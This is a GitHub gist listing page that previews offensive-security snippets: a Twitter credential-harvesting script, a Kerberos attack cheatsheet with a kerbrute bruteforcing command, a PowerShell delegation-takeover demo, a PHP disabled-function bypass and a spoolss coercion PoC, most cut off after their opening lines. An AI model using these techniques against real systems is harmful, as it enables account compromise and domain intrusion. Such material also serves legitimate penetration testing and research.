Skip to content

Instantly share code, notes, and snippets.

View snovvcrash's full-sized avatar
💭
Thinking in graphs

snovvcrash snovvcrash

💭
Thinking in graphs
1k followers · 110 following
View GitHub Profile
@tijme
tijme / tw33t.py
Last active June 24, 2023 19:18
Steal Twitter credentials via Google Dorks!
#!/usr/bin/env python3
# pip install python-twitter
# pip install colored
# pip install google
import re
import urllib3
import twitter
import requests
@MSAdministrator
MSAdministrator / iranian_apit_groups_possible_commands.md
Last active April 10, 2024 14:30
Iranian APT Groups & Possible Commands Used By These Groups

Overview

The following content is generated using a preview release of Swimlane's pyattck.

This snippet of data is scoped to the following actor groups:

  • APT33
  • APT34
  • APT39
  • Charming Kitten
@LoadLow
LoadLow / Readme.md
Last active August 14, 2023 13:55
Bypass shell_exec or system disabled functions by using GCONV (PHP rce to system())

This is based on https://hugeh0ge.github.io/2019/11/04/Getting-Arbitrary-Code-Execution-from-fopen-s-2nd-Argument/

Credits: @hugeh0ge

It uses iconv, in php, in order to execute the same payload.

Uses cases :

  • You control the first parameter of iconv (in_charset), you can set an env var and you can upload arbitrary files (.so library file and the gconv-modules file) and you know their path.
  • You have a php RCE but system, shell_exec, curl_exec and other functions are disabled but you can setenv (and LD_PRELOAD is blacklisted).
@sminez
sminez / get_ippsec_details.py
Last active January 5, 2024 05:51
Find examples of pen testing methods and tools in videos by Ippsec (as of 22nd January 2020)
#!/usr/bin/env python3
"""
Script used to pull down the current video descriptions from ippsec's youtube channel.
The raw output still has a few HTML tags that need to be manually removed and there
also seem to be multiple duplicates of videos that have been removed in the output
saved as ippsec-details.txt
"""
import re
import sys
@TarlogicSecurity
TarlogicSecurity / kerberos_attacks_cheatsheet.md
Created May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@HarmJ0y
HarmJ0y / rbcd_demo.ps1
Last active May 14, 2024 15:30
Resource-based constrained delegation computer DACL takeover demo
# import the necessary toolsets
Import-Module .\powermad.ps1
Import-Module .\powerview.ps1
# we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account
whoami
# the target computer object we're taking over
$TargetComputer = "primary.testlab.local"
@rasta-mouse
rasta-mouse / amsi-test-sample
Created February 21, 2019 18:55
Invoke-Expression 'AMSI Test Sample: 7e72c3ce-861b-4339-8740-0ac1484c1386'
@3xocyte
3xocyte / adidns_records.py
Last active November 23, 2023 21:20
get /etc/hosts entries from ADIDNS
#!/usr/bin/env python
import argparse
import sys
import binascii
import socket
import re
from ldap3 import Server, Connection, NTLM, ALL, SUBTREE, ALL_ATTRIBUTES
# get /etc/hosts entries for domain-joined computers from A and AAAA records (via LDAP/ADIDNS) (@3xocyte)
@3xocyte
3xocyte / dementor.py
Last active May 21, 2024 12:59
rough PoC to connect to spoolss to elicit machine account authentication
#!/usr/bin/env python
# abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample
# some code from https://www.exploit-db.com/exploits/2879/
import os
import sys
import argparse
import binascii
import ConfigParser
@vke-code
vke-code / download-all-repos.sh
Created September 12, 2018 21:39
#!/bin/bash
# Clone all github.com repositories for a specified user.
if [ $# -eq 0 ]
then
echo "Usage: $0 <user_name> "
exit;
fi